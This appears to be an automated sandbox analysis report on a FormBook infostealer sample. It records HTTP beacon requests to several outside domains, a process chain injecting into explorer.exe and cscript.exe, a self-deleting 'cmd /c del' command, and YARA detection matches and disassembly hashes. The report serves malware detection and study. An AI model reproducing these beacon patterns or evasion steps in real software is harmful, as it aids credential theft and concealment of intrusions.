72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.349817156.240.150.2280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:52.189634085 CEST9801OUTGET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.24000words.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:52.424355030 CEST9802INHTTP/1.1 200 OK
                                            Date: Wed, 27 Oct 2021 17:14:52 GMT
                                            Content-Length: 798
                                            Content-Type: text/html
                                            Server: nginx
                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cb ab d1 bc c9 bd b7 d0 d7 d1 d0 c5 d3 c3 b5 a3 b1 a3 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.349818172.67.216.280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:57.489799023 CEST9802OUTGET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1
                                            Host: www.healthyweekendtips.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:57.515161991 CEST9803INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 27 Oct 2021 17:14:57 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 27 Oct 2021 18:14:57 GMT
                                            Location: https://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5D1eXR4p2fJe882mIae8SPTGlhe7nnaOlKPFLrQXlzIMhBl9Y%2FnfiBvnR2i5ZMNEaPleGGKb%2BuYs05wAjXEMwI5xNH4xQyLNJJeEBO%2FeE%2FTQqjGhvRUh2brFEu8FMKXOFoyd2sXgHmi4sXOLBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6a4d904d5bbb6963-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.34981934.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:15:07.637352943 CEST9804OUTGET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1
                                            Host: www.thedusi.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:15:07.816297054 CEST9805INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 27 Oct 2021 17:15:07 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "61797039-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: CtTYTpaAKA.exe PID: 7140 Parent PID: 3336

                                            General

                                            Start time:19:13:01
                                            Start date:27/10/2021
                                            Path:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase:0x610000
                                            File size:512000 bytes
                                            MD5 hash:4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: CtTYTpaAKA.exe PID: 5784 Parent PID: 7140

                                            General

                                            Start time:19:13:03
                                            Start date:27/10/2021
                                            Path:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Imagebase:0x540000
                                            File size:512000 bytes
                                            MD5 hash:4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: explorer.exe PID: 3352 Parent PID: 5784

                                            General

                                            Start time:19:13:06
                                            Start date:27/10/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: cscript.exe PID: 5360 Parent PID: 3352

                                            General

                                            Start time:19:13:30
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cscript.exe
                                            Imagebase:0x840000
                                            File size:143360 bytes
                                            MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: cmd.exe PID: 6600 Parent PID: 5360

                                            General

                                            Start time:19:13:34
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: conhost.exe PID: 4816 Parent PID: 6600

                                            General

                                            Start time:19:13:35
                                            Start date:27/10/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: CtTYTpaAKA.exe PID: 7140 Parent PID: 3336 CtTYTpaAKA.exeCOMMON

                                              Executed Functions

                                              Function 0284E6A0, Relevance: .3, Instructions: 315COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e3a1f3a4ada4259f12f7378570b282b1b40730665bb573e6e7110f43f324a72
                                              • Instruction ID: d653cb02f6cc0f09acc3787d0df81290dc4532253b987b6c2b81dc225f37d988
                                              • Opcode Fuzzy Hash: 2e3a1f3a4ada4259f12f7378570b282b1b40730665bb573e6e7110f43f324a72
                                              • Instruction Fuzzy Hash: CF12E7F9C917468BE310CF65E89C288BB61F741328BD04B28C9652AAD5D7BC917ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0284E690, Relevance: .2, Instructions: 221COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd8c82c3e5f54877b0311c21e6f5f2f64ee5605fa745ed8c44ba3665b601f35d
                                              • Instruction ID: 8228fee99c22c624669937226a0b4cedb7270e6d33aef6ed44c269c630eef2a6
                                              • Opcode Fuzzy Hash: bd8c82c3e5f54877b0311c21e6f5f2f64ee5605fa745ed8c44ba3665b601f35d
                                              • Instruction Fuzzy Hash: A8C13CF9C517468BE310DF65E88C189BB61BB85328FD04B28D9612B6D0D7B8947ECF84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0284E69B, Relevance: .2, Instructions: 218COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f460b9fb08b01fe5ebc4f1906b9248ddd767915eda32d68816dd8ac66b6e325
                                              • Instruction ID: cee3ea05ca7a93f0e12233c4ec992576183f04c4b56b3ad221a41402ada95ae7
                                              • Opcode Fuzzy Hash: 0f460b9fb08b01fe5ebc4f1906b9248ddd767915eda32d68816dd8ac66b6e325
                                              • Instruction Fuzzy Hash: 49C13CF9C917468BE310DF65E88C189BB61BB85328FD04B28D9612B6D0D7B8947ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0284BBB0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0284BC10
                                              • GetCurrentThread.KERNEL32 ref: 0284BC4D
                                              • GetCurrentProcess.KERNEL32 ref: 0284BC8A
                                              • GetCurrentThreadId.KERNEL32 ref: 0284BCE3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: dbbd004a022eb88d65326e2936c28c47a9fd560e0e24404495a3ee62fd5a2c32
                                              • Instruction ID: 0d3e10bc53ccc5381c2ab313ca336dd763864257092e66c9217dfbe8cf62040d
                                              • Opcode Fuzzy Hash: dbbd004a022eb88d65326e2936c28c47a9fd560e0e24404495a3ee62fd5a2c32
                                              • Instruction Fuzzy Hash: 7F5136B8D006498FDB10CFAAC588BDEBBF1BF49308F248459D459A73A0CB749944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 028498B0, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02849AF6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 123fd1ef4fa326f641b8d61b6f6e13e0ad35159910c95a596d1be0b2d2dab567
                                              • Instruction ID: ef76748c73b546c380cbc4bc5f9e78151a58a7c05afe213159e005e06592ec92
                                              • Opcode Fuzzy Hash: 123fd1ef4fa326f641b8d61b6f6e13e0ad35159910c95a596d1be0b2d2dab567
                                              • Instruction Fuzzy Hash: AE711674A00B098FDB24DF6AD44579BBBF5BF88214F008A2ED49AD7A50DB74E805CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02843EC8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 028454A9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 32bcf0c352c4bfe486a156bcdadf365bbcd195a1f44f6806bb19721d2e96a977
                                              • Instruction ID: 6090703e0d83257ad7efa4273d18fd158bbf53b4ad2af7afe4a0647cd50a8b09
                                              • Opcode Fuzzy Hash: 32bcf0c352c4bfe486a156bcdadf365bbcd195a1f44f6806bb19721d2e96a977
                                              • Instruction Fuzzy Hash: 3641EDB5D0061CCBDB24CFA9C884BDEBBB5BF88308F60846AD408AB251DB756945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0284BDD2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284BE5F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: afe71d6769fc9e74232f804cca65dc338e445683f738340c7f5e853f683425cc
                                              • Instruction ID: 558ee264ed2518bff3c8fb730f3227f615d11af34a6d6ae3ad426500ce34fdc3
                                              • Opcode Fuzzy Hash: afe71d6769fc9e74232f804cca65dc338e445683f738340c7f5e853f683425cc
                                              • Instruction Fuzzy Hash: 5221E3B5D00248AFDB10CFAAD984ADEFBF4EF48324F14851AE954A3350D774A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0284BDD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284BE5F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f030c08b43baa973c48c2ceb269a3860c8ac4242779a25959949ba781223991b
                                              • Instruction ID: 6661757f4ce0a5fb1e2ccc7e69d1cb08a2222f085e31a022d04f79d0189f47a9
                                              • Opcode Fuzzy Hash: f030c08b43baa973c48c2ceb269a3860c8ac4242779a25959949ba781223991b
